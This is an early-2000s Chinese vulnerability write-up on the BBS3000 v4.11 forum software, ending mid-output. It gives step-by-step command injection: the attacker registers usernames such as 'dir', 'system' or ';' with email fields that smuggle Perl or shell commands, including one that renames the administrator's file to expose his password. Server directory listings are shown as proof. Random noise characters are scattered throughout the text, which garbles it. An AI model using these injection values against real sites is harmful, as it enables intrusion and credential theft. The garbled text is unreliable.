窥探YUZI的BBS3000社区安全性--1

YES东

窥探YUZI的BBS3000社区安全性--1
文章类型：漏洞分析 文章加入时间：2002年1月24日22:24
--------------------------------------------------------------------------------
/ `' R6 f# d, Q0 p1 y
窥探YUZI的BBS3000社区安全性
—————————————————————————————————
0 Z% d( z* u* K5 l/ ybadboy-club@21cn.com
部分漏洞提供者：
adver
x.z
1 j! p% n9 A& I% Y) @7 Y) u这并不是什么权威教材，只适合菜鸟了解某些免费提供的论坛程序存在的不
0 g$ P  G2 \2 |5 p% w* o! [3 E3 Z安全面，切莫用此方法在国内做尝试，如果你偏要如此，那么由此引起的一
" m' D' O0 {" E" J& i切法律后果由你自己负责。
, C+ @- v/ Y! G7 I5 p: E  v8 K本文只允许在网络任意转载，但须保留文章的完整性，如把本文作为经济目
的使用，或者未经本人许可进行印刷、光盘杂志、等出版性质的行为，本人
$ f3 e2 L1 S0 |( L将保留侵权控告的权利。
—————————————————————————————————
3 p( G, f  c1 B. x' o" y第一篇
; t! m% `$ k: w+ N, m% Q# Y2 @****基本漏洞测试*****
0 i# e. D- f  x- z/ \    YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛，
但不少用户很少去探测这论坛的安全性，使用者很大程度上信任作者，而实际上
& N$ d. l, N) e这些免费的版本和汉化修改论坛，往往存在一些致命的漏洞，本文的目的在于揭
7 X, {# q2 b$ u% y8 Q- g3 R示该论坛不为人知的漏洞，让大家更好的使用这类论坛，并且保证自身资料的隐
蔽和服务器的安全。
测试版本:bbs3000 v4.11
系统平台：win2k adv server=sp3 + iis 5.0  +ActivePerl 5.6.1.626
7 I- c% I+ q2 G2 a/ }( [应用程序映射:perl.exe %s %s 动作：GET,HEAD,POST
        或者:perlIS.dll 动作：GET,HEAD,POST
) c+ D) w8 W1 o0 c3 G* q2 U" {测试情况：
8 y) f6 Y/ i) I4 R一、用户名为dir的漏洞
" m& s" v/ P3 ]& u# _* e+ ?7 @1、采用应用程序映射:perl.exe %s %s应用程序映射
) ~1 u4 @  g' t! z, s  l8 F, G在站点建立一目录（或者虚拟目录）bbs3000,按论坛作者提供的说明书，默认安
9 I$ I! x. E1 P装BBS3000 v4.11版本，我们注册一用户名为dir,密码为system,信箱为
#badboy@badclub.org（#任意信箱都可以），然后我们在IE地址栏处输入：
8 H. A, u3 P' Y4 x5 s( D7 M! d8 Shttp://192.168.0.1/bbs3000/yhzl/dir.cgi
$ N5 y8 G/ ]. v# ]F:\new\bbs3000\bbs3000 的目录
2002-01-16  19:26       <DIR>          .
' q6 |- [% m, ]7 u: G, V! _2002-01-16  19:26       <DIR>          ..
2002-01-16  22:42               43,247 bbs.cgi
2002-01-16  22:47               50,934 cjyh.cgi
$ a/ y# ]' r1 r0 `2002-01-16  22:43               38,551 bbs1.cgi
3 y, \5 V4 V) Z# Y& J2002-01-16  22:48                6,401 cookie.cgi
2002-01-16  22:42                2,138 affiche.cgi
5 P2 _+ D# @: o% F# a5 B, X2002-01-16  22:43               22,434 bbs2.cgi
: q! M6 m& D. L$ W  |3 J（以下略）
              34 个文件        417,611 字节
+ V. @1 e' F2 z8 G& B              15 个目录  1,830,944,768 可用字节

2、采用应用程序映射:perlIS.dll应用程序映射
得到的显示页面为：
'F:\new\bbs3000\bbs3000\yhzl\dir.cgi' script produced no output
测试解释：在应用程序映射中，一个扩展名只能由一个程序去映射，在采用
perl.exe时，BBS3000存在查看网站目录和文件的漏洞，在采用perlIS.dll时，
则有暴露网站在服务器上的绝对地址的漏洞。
- r) ?! ?- @8 J, a二、用户名为system的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
8 D4 Z3 ?* a6 m1 Z/ g2 U- y3 n8 t  `( V注册一用户名为system，密码为空格键（或者密码为system），信箱为
'dir c:'#@badclub.org，然后我们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi
返回的页面显示为：
! A) A8 q3 R5 _) T0 QC:\ 的目录
2001-11-27  20:56                1,002 FRUNLOG.TXT
2001-11-27  20:49       <DIR>          WINNT
（以下略）
+ [0 ?) ]7 I# s( O              10 个文件         29,583 字节
7 G/ E. A5 V" C9 t               9 个目录    946,327,552 可用字节
当密码为其他时，则显示：
3 M. `* j! {8 Q) {$ j0 lCGI Error
  U9 g; f1 c+ e6 P1 ~. fThe specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
syntax error at F:\new\bbs3000\bbs3000\yhzl\system.cgi line 1, near
"1 system"Execution of F:\new\bbs3000\bbs3000\yhzl\system.cgi
* M3 Z$ U- g1 ^+ t, T% K% j  i$ Paborted due to compilation errors.
, f+ B/ G  J" t, d3 {3 j$ j# [我们还可以这样测试用户名为system的情况，密码仍然为空格键
（或者密码为system）但把信箱修改为＠ARGV##badboy@badclub.org，然后我
+ h# f4 m* l- r: M们在IE地址栏内输入：
) Q, w. O: z) X- e- z1 \http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
1 {# X9 l' N3 S) U返回的页面显示
5 S+ k5 V+ Q% y, |5 [D:\ 的目录
0 I2 b$ C( {& X; s) J2001-01-18  23:23       <DIR>          tools
2001-11-27  21:18       <DIR>          98tools
2001-04-08  13:08       <DIR>          W2Kreskit
2001-11-06  19:52       <DIR>          NOCDKEY-PROT
' n% U( e+ ?) d2001-12-01  21:32       <DIR>          WINNT
2001-12-01  21:39       <DIR>          Documents and Settings
: J( ^& T& Y, ?2001-12-01  21:41       <DIR>          Program Files
# A0 u" n9 I0 O/ r3 j. J% j0 X2001-12-01  21:53       <DIR>          Inetpub
2002-01-16  19:17       <DIR>          pl
- B3 t! ^$ S$ h! }% s0 x( S* @0 ]（以下省略部分内容）   
: S: M+ i1 i# }( _6 o7 E4 z           12 个文件     15,068,818 字节
1 n0 r* S, m% w  z) j# P; q3 z; _: @& \4 D              15 个目录  2,371,317,760 可用字节
'0' 不是内部或外部命令，也不是可运行的程序
5 X0 I& c3 m- _或批处理文件。
2、采用应用程序映射:perlIS.dll应用程序映射
9 W; a* o# o/ {7 D/ d( @+ t4 X用户名为system，密码为空格键（或者密码为system），信箱为'dir c:'#@badclub.org，
然后我们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi
( S; r% F3 v0 E0 v返回的页面显示为：
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
5 H0 G5 d. x% O, f. F2 J. x6 o2 C把信箱修改为＠ARGV##badboy@badclub.org，然后我们在IE地址栏内输入：
' R0 T" B0 r! Zhttp://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
3 P' E0 Y: k6 ^  H% ~( w1 Q$ Z1 p返回的页面显示
0 g& ]" G4 S: Z: n$ A'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
三、用户名为;字符的情况
& s: |1 f0 o% X, g5 j! ~2 k1、采用应用程序映射:perlIS.dll应用程序映射
注册一用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ，
（这里假设badboy为该论坛的社区区长，也就是该论坛最大权限的用户），然后我们
+ m' u3 p  T! u! y( }! z% L: k; G: {: |在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
, Q% @2 ]- S8 i* g  b4 @1 n8 K1 H! r2 ['F:\new\bbs3000\bbs3000\yhzl\;.cgi' script produced no output
嗯，怎么还是和上面的perl.dll例子一样啊？？后面的就是关键了，你再输入这样
7 ]( E. s- v5 m3 z- q的看看
http://192.168.0.1/bbs3000/yhzl/badboy.txt
返回的页面显示为
3 C$ q0 n3 X  z7 b" Y- Lbadpass badboy http://192.168.0.1 2002-01-16
显示的内容前面就是密码、用户
# i/ F) ]; d0 r0 t+ B天啊，事情怎么那么容易呀！！~_*
' H: D) n* x- _5 q经测试，用户名为system密码为一个空格键（或者为system)，信箱为
' F6 S% y% g1 J4 z/ O% x) O' t* wrename "badboy.cgi","badboy.txt";#@badclub.org 的时候，步骤和上面一样，同样
可以获得相同的结果。
2、采用应用程序映射:perl.exe %s %s应用程序映射
' s- U% |0 @. O! B8 f! h$ X用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org
在IE地址栏内输入：
4 e) k1 U, e! ?- Qhttp://192.168.0.1/bbs3000/yhzl/;.cgi
: j+ _/ g6 T$ D0 a返回的页面显示
; \) a* b" ^# {7 h3 J! Q# b: CCGI Error
4 }1 |2 a% t7 Z3 G* yThe specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
4 |. w, L$ o8 c